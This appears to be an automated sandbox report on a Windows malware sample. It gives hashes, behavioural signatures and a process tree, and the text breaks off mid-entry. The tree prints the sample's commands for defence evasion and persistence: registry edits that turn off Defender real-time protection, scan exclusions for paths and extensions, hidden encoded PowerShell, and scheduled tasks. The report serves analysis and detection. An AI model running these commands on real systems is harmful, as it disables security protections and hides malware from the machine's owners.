Analysis

  • max time kernel
    259s
  • max time network
    279s
  • platform
    windows7_x64
  • resource
    win7-20240729-en
  • resource tags

    arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system
  • submitted
    19/08/2024, 05:02

General

  • Target

    5e668bbec054d217c2d4dcf7820eafb257b58eebe68d590b6457da08269d9612.exe

  • Size

    7.3MB

  • MD5

    c47618b2e7036a916e89246af7327804

  • SHA1

    d10859e55e3330f8ea4d8ca112338556878fceb3

  • SHA256

    5e668bbec054d217c2d4dcf7820eafb257b58eebe68d590b6457da08269d9612

  • SHA512

    b02ec963143f61c675a10c91fe5f88376b8755b33bbd1b488406faf854c7751009496381b5f72bf19661980b0d6bf40567939f2cab1a36d614736f43327c0963

  • SSDEEP

    196608:91OXfYDkJ9kCHc6r+TClf1/OYtYrtvE6RKFk7o0slfhOFBLs4ROQQ/CV:3OvYDYjHcN2BkAYptRRotef+Q

Malware Config

Signatures

  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Windows security bypass 2 TTPs 40 IoCs
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs

    Run Powershell and hide display window.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 4 IoCs
  • Indirect Command Execution 1 TTPs 19 IoCs

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

  • Loads dropped DLL 23 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops Chrome extension 2 IoCs
  • Drops file in System32 directory 27 IoCs
  • Drops file in Program Files directory 13 IoCs
  • Drops file in Windows directory 4 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Enumerates system info in registry 2 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 39 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\5e668bbec054d217c2d4dcf7820eafb257b58eebe68d590b6457da08269d9612.exe
    "C:\Users\Admin\AppData\Local\Temp\5e668bbec054d217c2d4dcf7820eafb257b58eebe68d590b6457da08269d9612.exe"
    1⤵
    • Loads dropped DLL
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:1384
    • C:\Users\Admin\AppData\Local\Temp\7zS696.tmp\Install.exe
      .\Install.exe
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Users\Admin\AppData\Local\Temp\7zS13BF.tmp\Install.exe
        .\Install.exe /SdiddfUqq "525403" /S
        3⤵
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Enumerates system info in registry
        • Suspicious use of WriteProcessMemory
        PID:2032
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2804
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:3036
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:3032
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:3060
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • Suspicious use of WriteProcessMemory
            PID:2632
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
              6⤵
              • Suspicious use of WriteProcessMemory
              PID:2592
              • \??\c:\windows\SysWOW64\reg.exe
                reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                7⤵
                • System Location Discovery: System Language Discovery
                PID:2752
          • C:\Windows\SysWOW64\forfiles.exe
            forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
            5⤵
            • Indirect Command Execution
            • System Location Discovery: System Language Discovery
            PID:2792
            • C:\Windows\SysWOW64\cmd.exe
              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
              6⤵
                PID:2704
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2636
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              5⤵
              • Indirect Command Execution
              PID:2596
              • C:\Windows\SysWOW64\cmd.exe
                /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2868
                • \??\c:\windows\SysWOW64\reg.exe
                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  7⤵
                  • System Location Discovery: System Language Discovery
                  PID:2784
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
              5⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:2812
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                6⤵
                • System Location Discovery: System Language Discovery
                PID:2760
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell start-process -WindowStyle Hidden gpupdate.exe /force
                  7⤵
                  • Command and Scripting Interpreter: PowerShell
                  • Drops file in System32 directory
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:3028
                  • C:\Windows\SysWOW64\gpupdate.exe
                    "C:\Windows\system32\gpupdate.exe" /force
                    8⤵
                      PID:2664
            • C:\Windows\SysWOW64\forfiles.exe
              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m help.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
              4⤵
              • Indirect Command Execution
              PID:1064
              • C:\Windows\SysWOW64\cmd.exe
                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                5⤵
                  PID:1684
                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                    6⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Drops file in System32 directory
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:788
                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                      7⤵
                      • Suspicious use of AdjustPrivilegeToken
                      PID:320
              • C:\Windows\SysWOW64\schtasks.exe
                schtasks /CREATE /TN "bdWlhxaDpnKLPtrOII" /SC once /ST 05:04:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp\wvhEPvQLPCVgiST\XUBoSEi.exe\" 5O /Sdidd 525403 /S" /V1 /F
                4⤵
                • Drops file in Windows directory
                • System Location Discovery: System Language Discovery
                • Scheduled Task/Job: Scheduled Task
                PID:2012
              • C:\Windows\SysWOW64\WerFault.exe
                C:\Windows\SysWOW64\WerFault.exe -u -p 2032 -s 668
                4⤵
                • Loads dropped DLL
                • Program crash
                PID:2116
        • C:\Windows\system32\taskeng.exe
          taskeng.exe {087463E8-BB2B-4FE9-8586-28973DBCE121} S-1-5-18:NT AUTHORITY\System:Service:
          1⤵
            PID:2692
            • C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp\wvhEPvQLPCVgiST\XUBoSEi.exe
              C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp\wvhEPvQLPCVgiST\XUBoSEi.exe 5O /Sdidd 525403 /S
              2⤵
              • Executes dropped EXE
              • Drops file in System32 directory
              • Modifies data under HKEY_USERS
              PID:748
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                3⤵
                  PID:2688
                  • C:\Windows\SysWOW64\forfiles.exe
                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                    4⤵
                    • Indirect Command Execution
                    • System Location Discovery: System Language Discovery
                    PID:1172
                    • C:\Windows\SysWOW64\cmd.exe
                      /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      5⤵
                        PID:1852
                        • \??\c:\windows\SysWOW64\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                          6⤵
                            PID:1048
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        • System Location Discovery: System Language Discovery
                        PID:988
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                          5⤵
                          • System Location Discovery: System Language Discovery
                          PID:316
                          • \??\c:\windows\SysWOW64\reg.exe
                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                            6⤵
                            • System Location Discovery: System Language Discovery
                            PID:944
                      • C:\Windows\SysWOW64\forfiles.exe
                        forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                        4⤵
                        • Indirect Command Execution
                        PID:1396
                        • C:\Windows\SysWOW64\cmd.exe
                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                          5⤵
                            PID:1088
                            • \??\c:\windows\SysWOW64\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                              6⤵
                                PID:924
                          • C:\Windows\SysWOW64\forfiles.exe
                            forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                            4⤵
                            • Indirect Command Execution
                            PID:1860
                            • C:\Windows\SysWOW64\cmd.exe
                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                              5⤵
                                PID:1808
                                • \??\c:\windows\SysWOW64\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                  6⤵
                                    PID:892
                              • C:\Windows\SysWOW64\forfiles.exe
                                forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                4⤵
                                • Indirect Command Execution
                                • System Location Discovery: System Language Discovery
                                PID:904
                                • C:\Windows\SysWOW64\cmd.exe
                                  /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                  5⤵
                                    PID:1756
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Drops file in System32 directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1036
                                      • C:\Windows\SysWOW64\gpupdate.exe
                                        "C:\Windows\system32\gpupdate.exe" /force
                                        7⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2184
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /CREATE /TN "ghgifyLKy" /SC once /ST 03:33:07 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                3⤵
                                • Scheduled Task/Job: Scheduled Task
                                PID:1032
                              • C:\Windows\SysWOW64\schtasks.exe
                                schtasks /run /I /tn "ghgifyLKy"
                                3⤵
                                  PID:2140
                                • C:\Windows\SysWOW64\schtasks.exe
                                  schtasks /DELETE /F /TN "ghgifyLKy"
                                  3⤵
                                    PID:2772
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                    3⤵
                                      PID:2612
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:2868
                                    • C:\Windows\SysWOW64\cmd.exe
                                      cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2596
                                      • C:\Windows\SysWOW64\reg.exe
                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                        4⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:2648
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /CREATE /TN "gZKxdKNZR" /SC once /ST 01:39:28 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2656
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /run /I /tn "gZKxdKNZR"
                                      3⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2496
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      schtasks /DELETE /F /TN "gZKxdKNZR"
                                      3⤵
                                        PID:484
                                      • C:\Windows\SysWOW64\forfiles.exe
                                        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                        3⤵
                                        • Indirect Command Execution
                                        • System Location Discovery: System Language Discovery
                                        PID:1856
                                        • C:\Windows\SysWOW64\cmd.exe
                                          /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                          4⤵
                                            PID:1656
                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                              powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                              5⤵
                                              • Command and Scripting Interpreter: PowerShell
                                              • Drops file in System32 directory
                                              • Suspicious behavior: EnumeratesProcesses
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2364
                                              • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                6⤵
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:1664
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:32
                                          3⤵
                                            PID:1492
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • Windows security bypass
                                              • System Location Discovery: System Language Discovery
                                              PID:2476
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:1148
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:64
                                              4⤵
                                              • Windows security bypass
                                              PID:1112
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:32
                                            3⤵
                                            • System Location Discovery: System Language Discovery
                                            PID:2324
                                            • C:\Windows\SysWOW64\reg.exe
                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:32
                                              4⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:916
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:64
                                            3⤵
                                              PID:1632
                                              • C:\Windows\SysWOW64\reg.exe
                                                REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YQhqHXZBhguGrggk" /t REG_DWORD /d 0 /reg:64
                                                4⤵
                                                  PID:1972
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /C copy nul "C:\Windows\Temp\YQhqHXZBhguGrggk\BAWmrlfI\QbRHwVmQfBqurumJ.wsf"
                                                3⤵
                                                  PID:2076
                                                • C:\Windows\SysWOW64\wscript.exe
                                                  wscript "C:\Windows\Temp\YQhqHXZBhguGrggk\BAWmrlfI\QbRHwVmQfBqurumJ.wsf"
                                                  3⤵
                                                  • System Location Discovery: System Language Discovery
                                                  • Modifies data under HKEY_USERS
                                                  PID:1240
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BLxKwlsvgycOtcGgzTR" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:584
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\BLxKwlsvgycOtcGgzTR" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2036
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OSXovakinWMKC" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2192
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\OSXovakinWMKC" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2840
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YCXTaorKmfUn" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1092
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YCXTaorKmfUn" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:924
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkliFOiDrNJU2" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:908
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\lkliFOiDrNJU2" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1648
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpguEeVzU" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:1532
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qpguEeVzU" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:2456
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kyGmhDrgQBsTgrVB" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:624
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\kyGmhDrgQBsTgrVB" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1280
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:1812
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
                                                    4⤵
                                                    • Windows security bypass
                                                    PID:696
                                                  • C:\Windows\SysWOW64\reg.exe
                                                    "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\jvorzuBqPXnSOeEVp" /t REG_DWORD /d 0 /reg:32
                                                    4⤵
                                                    • Windows security bypass
                                                    • System Location Discovery: System Language Discovery
                                                    PID:2860
                                                  • C:\Windows\SysWOW64\reg.exe
